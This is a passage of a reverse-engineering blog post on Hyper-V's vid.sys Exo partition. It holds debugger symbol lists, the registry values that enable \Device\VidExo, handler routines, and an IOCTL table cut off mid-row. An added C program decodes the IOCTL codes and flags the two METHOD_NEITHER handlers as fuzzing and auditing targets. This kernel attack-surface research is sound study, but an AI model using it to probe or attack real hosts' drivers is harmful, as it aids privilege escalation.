<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Exo object is the address of the vid.sys variable VidExoDeviceContext. The Prtn object created for an Exo partition doesn’t contain a partition name (a full VM partition has the same name as the VM in Hyper-V Manager; a container partition is named “Virtual machine”), but a GUID for the EXO partition is present.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are not so many Exo functions in the vid.sys kernel driver:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="margin-left: -5.4pt; text-align: left;">
<table style="border-collapse: collapse; border: none; text-align: left;"><colgroup><col width="311"></col><col width="312"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 10 x64 20H1</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 10 x64 1803</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> x /1 vid!*exo*</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExopAccessVaFault</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopIoControlPreProcess</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileClose</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileObjectDestroy</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopUpdateDeviceSecurity</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCleanup</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopDeviceSetupInternal</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopRegKeyNotificationHandler</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCreate</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoVpStopCompleteMessageCallback</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlDriver</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoCurrentProcessIsAccessAllowed</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoPartitionInitialize</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmNtSlatExoGpaAccessVaFault</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoGpaRangeIoctlUnmap</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoGpaRangeIoctlAccessTrackingControl</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoTranslateGuestVirtualAddress</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceContext</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoInterceptsHandlePassthrough</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoGpaRangeIoctlMap</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmExoHandleMemoryIntercept</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidInformationIoctlExoGetSystemInformation</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoIoControlDriver</span></span><br />
<div>
<br /></div>
</div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0: kd> x /1 vid!*exo*</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopIoControlPreProcess</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileClose</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileObjectDestroy</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopUpdateDeviceSecurity</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCleanup</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExopFileCreate</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlDriver</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceTeardown</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoCurrentProcessIsAccessAllowed</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoPartitionInitialize</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VsmmGpaRangeIoctlExoCreateSpecifyUserVa</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceContext</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoDeviceSetup</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Vid!VidExoFastIoControlPartition</span></span><br />
<div>
<br /></div>
</div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">There are two values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vid\Parameters key</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"> ExoDeviceEnabled</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"> ExoDeviceEnabledClient</span></span><br />
<div>
<br /></div>
</div>
</div>
<div style="text-align: left;">
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="75" src="https://lh5.googleusercontent.com/vyOanNVy9nrtHj7ypBTYbIeWqQtVcGCFQaHBVrJXHCtrJ3gAcemekMkQzPi59fkcr1r7ySLLGacVAN4J8GJJ-SuZN6unsNpDnNO58Xxxmh3efOOjB03vdE_As47p0jKGQeYNH1S1ASg8mtkzJg" style="margin-left: 0px; margin-top: 0px;" width="461" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 28.35pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If both are zero, nothing happened, but if one of them is changed, Vid.sys!VidExopRegKeyNotificationHandler immediately starts to work (it was early registered using nt!ZwNotifyChangeKey).</span><br />
<span style="font-family: "calibri" , sans-serif; font-size: 10.6667px;"><br /></span>
<span style="font-family: "calibri" , sans-serif; font-size: 10.6667px;">If one of variables equivalent 1, then vid.sys!VidExopDeviceSetupInternal function is executed, created device object \Device\VidExo and SymbolicLink \DosDevices\VidExo and registered handler functions:</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopFileCreate</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopFileClose</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopFileCleanup</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExopIoControlPreProcess </span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidIoControl</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Separate handlers for fast I\O:</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExoFastIoControlPartition</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">VidExoFastIoControlDriver</span></span><br />
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;"><br /></span></span>
<span style="font-family: "calibri" , sans-serif;"><span style="font-size: 10.6667px;">Function is finished by calling VidObjectHeaderInitialize(VidExoDeviceContext, ' oxE')</span></span><br />
<div>
<br /></div>
</div>
</div>
<div style="text-align: left;">
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VidExopIoControlPreProcess – function, that is used to process IOCTL requests, sending to the VidExo object, the vid.sys!VidIoControlPreProcess function is called from it, first parameter of which is transferred to the VM_PROCESS_CONTEXT structure. If VM_PROCESS_CONTEXT contains “Prtn” signature, then VidExoIoControlPartition will be executed, if “Exo”, then vid.sys!VidExoIoControlDriver (it calls winhvr!WinHvGetSystemInformation with certain parameters, however, I did not encounter the case when this function is executed, because exo-object is not partition object). Accordingly, even in the case of working with the WHVP API, almost all work is carried out with a Prtn-object.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next functions can be called from vid.sys!VidExoIoControlPartition:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidIoControlPartition</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInstallIntercept</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLocalInterruptControllerState</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLocalInterruptControllerState</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoGpaRangeIoctlAccessTrackingControl</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoGpaRangeIoctlUnmap</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmExoGpaRangeIoctlMap</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VidIoControlPartition can handle limited IOCTL queries for EXO partitions.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
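<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Added example (my own code, not part of the original post and not Microsoft's): it takes the raw IOCTL codes from the table below and decodes them into their CTL_CODE fields (device type, access, function, transfer method), then flags the METHOD_NEITHER ones. For METHOD_NEITHER the I/O manager neither copies nor probes the buffers, so the driver receives raw user-mode pointers (Type3InputBuffer / UserBuffer) and has to validate them itself; those handlers are the first place to look when auditing or fuzzing \\.\VidExo. The macro values mirror winioctl.h/ntddk.h so the file builds outside Windows. The numeric value 0x206F7845 for the ' oxE' object tag is an assumption derived from the printed constant, not a value read from the driver; the fast I/O handlers mentioned above are a separate path that this decode does not cover.</span></div>
</div>

```c
/* Added example: decode the VidIoControlPartition IOCTL codes from the table
 * into CTL_CODE fields and flag the METHOD_NEITHER ones (raw user pointers).
 * Macro values mirror winioctl.h / ntddk.h so this builds on any platform. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define METHOD_BUFFERED     0
#define METHOD_IN_DIRECT    1
#define METHOD_OUT_DIRECT   2
#define METHOD_NEITHER      3
#define FILE_DEVICE_UNKNOWN 0x22

typedef struct {
    uint32_t device_type; /* bits 31..16 */
    uint32_t access;      /* bits 15..14: 0 = FILE_ANY_ACCESS, 1 = READ, 2 = WRITE */
    uint32_t function;    /* bits 13..2 */
    uint32_t method;      /* bits 1..0 */
} ioctl_parts;

ioctl_parts decode_ioctl(uint32_t code)
{
    ioctl_parts p;
    p.device_type = (code >> 16) & 0xFFFF;
    p.access      = (code >> 14) & 0x3;
    p.function    = (code >> 2) & 0xFFF;
    p.method      = code & 0x3;
    return p;
}

const char *method_name(uint32_t method)
{
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                   "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[method & 0x3];
}

/* Codes and handler names copied from the table in the post. */
static const struct { uint32_t code; const char *handler; } vid_exo_ioctls[] = {
    { 0x221184, "VidVpIoctlStart" },
    { 0x221034, "VsmmDoorbellCreateEntry" },
    { 0x2210BC, "(WinHvGetXsaveData)" },
    { 0x2210D0, "VidHvStatsIoctlPageMapLocal" },
    { 0x2210D4, "VidHypercallDoorbellIoctlMap" },
    { 0x2210DC, "VidVpLookup" },
    { 0x2210F0, "VidMessageSlotMap" },
    { 0x221134, "VidCpuidResultRegister" },
    { 0x221174, "VidPartitionIoctlSetup" },
    { 0x22117C, "(WinHvSetXsaveData)" },
    { 0x220003, "VidPartitionIoctlPropertyGet" },
    { 0x22122B, "VsmmVaGpaCoreGetGpaPageProperties" },
};
#define VID_EXO_IOCTL_COUNT (sizeof(vid_exo_ioctls) / sizeof(vid_exo_ioctls[0]))

/* Entries whose buffers bypass I/O-manager copying/probing (METHOD_NEITHER). */
size_t count_neither_ioctls(void)
{
    size_t n = 0;
    for (size_t i = 0; i < VID_EXO_IOCTL_COUNT; i++)
        if (decode_ioctl(vid_exo_ioctls[i].code).method == METHOD_NEITHER)
            n++;
    return n;
}

/* Decompilers print a 32-bit tag in register byte order (' oxE'); the same
 * DWORD stored little-endian reads "Exo " in memory. The value 0x206F7845
 * used by the caller is assumed from the printed form, not read from vid.sys. */
void tag_to_bytes(uint32_t tag, char out[5])
{
    for (int i = 0; i < 4; i++)
        out[i] = (char)((tag >> (8 * i)) & 0xFF);
    out[4] = '\0';
}

int tag_reads_as(uint32_t tag, const char *expected)
{
    char buf[5];
    tag_to_bytes(tag, buf);
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    char tag[5];
    printf("%-9s %-5s %-6s %-7s %-18s %s\n", "code", "dev", "func", "access", "method", "handler");
    for (size_t i = 0; i < VID_EXO_IOCTL_COUNT; i++) {
        ioctl_parts p = decode_ioctl(vid_exo_ioctls[i].code);
        printf("0x%06X  0x%02X  0x%03X  %u       %-18s %s%s\n",
               vid_exo_ioctls[i].code, p.device_type, p.function, p.access,
               method_name(p.method), vid_exo_ioctls[i].handler,
               p.method == METHOD_NEITHER ? "  <-- raw user pointers" : "");
    }
    tag_to_bytes(0x206F7845, tag);
    printf("object tag ' oxE' in memory: \"%s\"\n", tag);
    return 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">All twelve codes decode to device type 0x22 (FILE_DEVICE_UNKNOWN) with FILE_ANY_ACCESS; ten use METHOD_BUFFERED, while 0x220003 (VidPartitionIoctlPropertyGet) and 0x22122B (VsmmVaGpaCoreGetGpaPageProperties) use METHOD_NEITHER, so their input and output pointers arrive unprobed and the handler must do its own ProbeForRead/ProbeForWrite under __try/__except.</span></div>
</div>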
<div dir="ltr" style="margin-left: -5.4pt; text-align: left;">
<table style="border-collapse: collapse; border: none; text-align: left;"><colgroup><col width="191"></col><col width="206"></col><col width="226"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">IOCTL</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Функция</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Подфункции (для информации)</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221184</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidVpIoctlStart</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VidMessageSlotCancelWait, no winhv call</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x221034</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VsmmDoorbellCreateEntry</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocatePortId, WinHvCreatePort, WinHvConnectPort</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0x2210BC</span></div>
